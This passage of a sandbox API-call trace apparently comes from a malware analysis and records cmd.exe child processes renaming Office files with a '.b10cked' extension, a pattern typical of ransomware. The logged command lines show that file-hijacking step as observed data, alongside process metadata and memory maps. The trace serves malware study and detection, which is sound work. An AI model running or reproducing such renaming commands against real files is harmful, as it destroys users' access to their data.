nBufferLength=0x104, lpBuffer=0x2ef920, lpFilePart=0x2ef91c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef91c*="Desktop") returned 0x18 [0172.989] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.989] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef69c | out: lpFindFileData=0x2ef69c) returned 0x4909f0 [0172.989] FindClose (in: hFindFile=0x4909f0 | out: hFindFile=0x4909f0) returned 1 [0172.989] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef69c | out: lpFindFileData=0x2ef69c) returned 0x4909f0 [0172.990] FindClose (in: hFindFile=0x4909f0 | out: hFindFile=0x4909f0) returned 1 [0172.990] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef69c | out: lpFindFileData=0x2ef69c) returned 0x4909f0 [0172.990] FindClose (in: hFindFile=0x4909f0 | out: hFindFile=0x4909f0) returned 1 [0172.990] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.990] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0172.990] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0172.990] GetEnvironmentStringsW () returned 0x490210* [0172.990] FreeEnvironmentStringsW (penv=0x490210) returned 1 [0172.990] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.991] GetConsoleOutputCP () returned 0x1b5 [0172.991] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.991] GetUserDefaultLCID () returned 0x409 [0172.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0172.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efa60, cchData=128 | out: lpLCData="0") returned 2 [0172.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efa60, cchData=128 | out: lpLCData="0") returned 2 [0172.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efa60, cchData=128 | out: lpLCData="1") returned 2 [0172.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0172.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0172.991] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0172.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0172.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0172.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0172.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0172.992] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0172.992] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0172.992] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0172.992] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0172.993] GetConsoleTitleW (in: lpConsoleTitle=0x480930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.993] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.993] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0172.993] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0172.993] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0172.993] _wcsicmp (_String1="move", _String2=")") returned 68 [0172.994] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0172.994] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0172.994] _wcsicmp (_String1="IF", _String2="move") returned -4 [0172.994] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0172.994] _wcsicmp (_String1="REM", _String2="move") returned 5 [0172.994] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0172.997] GetConsoleTitleW (in: lpConsoleTitle=0x2ef758, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.997] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0172.997] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0172.997] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0172.997] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0172.997] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0172.998] _wcsicmp (_String1="move", _String2="CD") returned 10 [0172.998] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0172.998] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0172.998] _wcsicmp (_String1="move", _String2="REN") returned -5 [0172.998] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0172.998] _wcsicmp (_String1="move", _String2="SET") returned -6 [0172.998] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0172.998] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0172.998] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0172.998] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0172.998] _wcsicmp (_String1="move", _String2="MD") returned 11 [0172.998] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0172.998] _wcsicmp (_String1="move", _String2="RD") returned -5 [0172.998] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0172.998] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0172.998] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0172.998] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0172.998] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0172.998] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0172.998] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0172.998] _wcsicmp (_String1="move", _String2="VER") returned -9 [0172.998] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0172.998] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0172.998] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0172.998] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0172.998] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0172.998] _wcsicmp (_String1="move", _String2="START") returned -6 [0172.998] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0172.998] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0172.998] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0173.000] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.000] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.000] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef514, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef50c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef50c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.000] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0173.001] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0173.001] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0173.001] _wcsicmp (_String1="PUB6IN~1.TRX", _String2=".") returned 66 [0173.001] _wcsicmp (_String1="PUB6IN~1.TRX", _String2="..") returned 66 [0173.001] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6in~1.trx")) returned 0x2020 [0173.002] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x491f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.002] SetErrorMode (uMode=0x0) returned 0x0 [0173.002] SetErrorMode (uMode=0x1) returned 0x0 [0173.002] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX", nBufferLength=0x104, lpBuffer=0x2eee9c, lpFilePart=0x2eee84 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX", lpFilePart=0x2eee84*="PUB6IN~1.TRX") returned 0x3c [0173.002] SetErrorMode (uMode=0x0) returned 0x1 [0173.002] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0173.002] _wcsicmp (_String1="PUB6IN~1.TRX", _String2=".") returned 66 [0173.002] _wcsicmp (_String1="PUB6IN~1.TRX", _String2="..") returned 66 [0173.002] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6in~1.trx")) returned 0x2020 [0173.002] SetErrorMode (uMode=0x0) returned 0x0 [0173.002] SetErrorMode (uMode=0x1) returned 0x0 [0173.002] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX", nBufferLength=0x104, lpBuffer=0x2ef318, lpFilePart=0x2ef0b0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX", lpFilePart=0x2ef0b0*="PUB6IN~1.TRX") returned 0x3c [0173.002] SetErrorMode (uMode=0x0) returned 0x1 [0173.002] SetErrorMode (uMode=0x0) returned 0x0 [0173.002] SetErrorMode (uMode=0x1) returned 0x0 [0173.002] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2ef520, lpFilePart=0x2ef0b0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll.b10cked", lpFilePart=0x2ef0b0*="PUB6INTL.DLL.trx_dll.b10cked") returned 0x4c [0173.002] SetErrorMode (uMode=0x0) returned 0x1 [0173.003] SetLastError (dwErrCode=0x0) [0173.003] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6intl.dll.trx_dll.b10cked")) returned 0xffffffff [0173.003] GetLastError () returned 0x2 [0173.003] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2eea2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eea2c) returned 0x492130 [0173.003] FindNextFileW (in: hFindFile=0x492130, lpFindFileData=0x2eea2c | out: lpFindFileData=0x2eea2c) returned 0 [0173.003] GetLastError () returned 0x12 [0173.003] FindClose (in: hFindFile=0x492130 | out: hFindFile=0x492130) returned 1 [0173.005] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x491cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x491cc0) returned 0x492130 [0173.005] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2eecc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0173.005] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x2eecc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0173.005] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6intl.dll.trx_dll")) returned 0x2020 [0173.005] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6intl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6intl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0173.006] FindClose (in: hFindFile=0x492130 | out: hFindFile=0x492130) returned 1 [0173.006] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2eec78 | out: _Buffer=" 1") returned 9 [0173.006] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.006] GetFileType (hFile=0x7) returned 0x2 [0173.086] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.086] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eec04 | out: lpMode=0x2eec04) returned 1 [0173.086] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.086] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2eec38 | out: lpConsoleScreenBufferInfo=0x2eec38) returned 1 [0173.086] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0173.087] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2eec78 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0173.087] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2eec5c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2eec5c*=0x1a) returned 1 [0173.087] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.087] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.087] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.087] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.087] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.087] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.087] SetConsoleInputExeNameW () returned 0x1 [0173.087] GetConsoleOutputCP () returned 0x1b5 [0173.088] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.088] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.088] exit (_Code=0) Process: id = "300" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b60" os_pid = "0x958" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23549 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23550 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 23551 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 23552 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 23553 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23554 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23555 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23556 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23557 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 23558 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23634 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23635 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23636 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23637 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 23638 start_va = 0x5d0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 23639 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23640 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23641 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23642 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23643 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23644 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23645 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23646 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23647 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23648 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 23649 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23650 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23651 start_va = 0x290000 end_va = 0x296fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 23652 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 23653 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 23654 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 23655 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 23656 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 23657 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 399 os_tid = 0x2ac [0173.050] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f89c | out: lpSystemTimeAsFileTime=0x28f89c*(dwLowDateTime=0x9d0b9660, dwHighDateTime=0x1d440a9)) [0173.050] GetCurrentProcessId () returned 0x958 [0173.050] GetCurrentThreadId () returned 0x2ac [0173.050] GetTickCount () returned 0x32673 [0173.050] QueryPerformanceCounter (in: lpPerformanceCount=0x28f894 | out: lpPerformanceCount=0x28f894*=22983902523) returned 1 [0173.050] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0173.050] __set_app_type (_Type=0x1) [0173.050] __p__fmode () returned 0x76b331f4 [0173.050] __p__commode () returned 0x76b331fc [0173.051] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0173.051] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0173.051] GetCurrentThreadId () returned 0x2ac [0173.051] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x2ac) returned 0x38 [0173.051] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.051] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0173.051] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.051] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0173.051] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f82c | out: phkResult=0x28f82c*=0x0) returned 0x2 [0173.051] VirtualQuery (in: lpAddress=0x28f863, lpBuffer=0x28f7fc, dwLength=0x1c 